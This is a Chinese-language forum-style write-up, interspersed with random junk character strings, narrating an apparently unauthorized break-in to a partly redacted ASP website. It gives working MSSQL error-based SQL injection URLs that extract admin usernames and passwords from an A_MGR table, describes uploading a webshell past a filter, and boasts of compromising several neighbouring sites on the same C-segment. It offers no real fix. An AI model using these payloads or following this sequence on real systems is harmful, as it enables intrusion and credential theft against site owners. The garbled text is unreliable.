发现一个注入点7 \ f1 q) y3 E, M2 s
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
7 I: v+ O) l) R4 Q- B. t6 c# {% ~/ i3 W# R2 S$ _$ p
习惯性的加’having1=1--
, F( w$ t v5 F3 [# D% k/ L2 S& X% L* z. s% C% J+ f
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
7 F. S5 a& `! y! y* F, d
7 t" a6 O. b( O+ B- C* [9 G06 C8 t2 r! X0 F- P: I
% l Y: K2 l' w. y' _8 x6 [* x爆出Diary_A.dl_Title(这时候很激动啊). [$ ^8 h( o* i' e, p1 h' U$ B/ T
0 [1 e4 }& V6 @5 P那么继续7 t# C% b3 B7 u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—- S) A- A' V$ q- z" W5 _1 @
# o" ]; M; ~0 H2 L9 N
继续,一直爆下去: y# P5 x3 I/ g* A% w
) g) _" s# ?& u1 Z
爆到几个字段和表段 但是没找到需要的管理用户的字段
# z2 ^$ O7 v* h0 Z! Y% y% x
" s, L' Y. O9 r! g% [9 t8 O蛋疼了 怎么办 然后去后台登陆页看源码
; j; F% `. K+ j
7 Z$ C: n: W* w$ _8 c( D7 ]0
# R3 [5 J% e. Z
% e! W6 a8 b; z1 a5 D7 K& f9 A+ XInput name= “ADUID”
1 o$ q- u) S3 K3 dInput name= “ADPWD”1 G, W5 `: z; g! `) X2 u
1 K& h6 J% a& R& B
很幸运 找到了字段那就继续
. J, }) j1 W( s1 H6 Z找到之后开始爆用户
+ q' v V) Z; ~$ d& Yhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—; I* T8 X+ H+ K9 N. c% q
爆密码 k2 ^7 Z( `0 f* W! ^$ e' i
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—3 B2 \' I, A: y+ n$ t" P2 t* D( `
测试了下 这个注入点只能爆到文章哪里的表
# @- g1 T$ E" |( K% G: G! t& M5 F5 U2 m. T0 X0 |
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了! n3 M" d, ?! _; _& l
$ b" |/ l; X7 q; A1 |& N! B
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了/ |; a- W2 F5 N3 ^) q3 K
- O8 U1 M b9 d
4732 [& r$ H9 X( w% ^2 S1 r/ C) x) ]
) F* q" M# {* M. X7 E
进后台
* m4 Y9 X |2 ~5 L+ g3 f& _0 S+ `- `- G: T
) }+ t( q7 B+ N# _发现几个上传点 有的地方不能上传 而且防止恶意代码& Q( C0 Y9 ?9 X
3 m+ b: u) g" {2 {4 Z没办法 各种百度各种找大牛 找到一只好像可以突破的马
) E7 t7 c( B0 B# G' D8 {- C r4 s, F; {" ]3 L
+ }8 a; U; q- @ U! t ?
在系统管理那里直接上传 不过没有显示地址% H/ F- T6 |; z' J! a
: ^4 }* P! N. k1 w再上传一次 抓包 搞定OK! v/ @( q4 ?0 ~7 z; \7 x
3 _7 \! p# k; E0 q+ E2 V! j% X
7 c: O7 {" r8 h6 Q
9 b, x7 D6 J. l+ M) ^0 P# D$ B1 W472
2 @0 U2 v, s3 ^$ J' H5 z/ D/ |4 }6 l/ Z1 W- b# x
晚上不行了 去睡觉。。。
- I- {% t( p2 ~* B z4 P第二天刚起床 闲的没事做继续日站吧 % q0 y6 R" a3 m: w* \. b4 }
; a$ b6 P0 |% p+ `
找个站 就把这个站的旁c扫了下5 S- F+ o- Z! W1 z& t% b9 L
9 D' e+ s0 v& o5 h, \: y* A* H, U1 A发现c段也有一个购物站 ,然后还和这个站的模板差不多
" H6 W: X/ k! j* v+ l
! x* @3 y( n! B, B! q, K就找到会员登录口测试
: T, p) U; v% l S; n; E5 t
7 p2 o4 T8 d% Q6 q. J: Y'and (select top 1 MGR_UID from A_MGR)>0—
: h; L& C! z' l0 ?果断爆到了 这时候我很激动 通杀
! p4 s# V1 u3 m
5 u/ M Y2 a, ]- n: r( g再次翻c段
) {6 F& \+ O+ {0 M0 z
) \1 u8 E- i' r0 H7 s翻出几个站 都成功拿下1 k5 N' G$ E& Q+ T. _5 W( M
- d: `5 v& ?: j& |! Z
% ]' I+ W0 M- @: w$ _3 L
^9 Z6 t0 ?; ~0 K" }+ s7 F修复方案:3 }) S G& q' @# W5 M k7 y
他们比我专业
* W! [/ `$ G$ D8 u8 b% g! X+ z/ \$ `# P! |( P5 J9 I' n3 V" i3 c$ Q
& q& O4 n7 j& }) D- j) v$ J
- O6 j( u+ U* y' T( W; G
|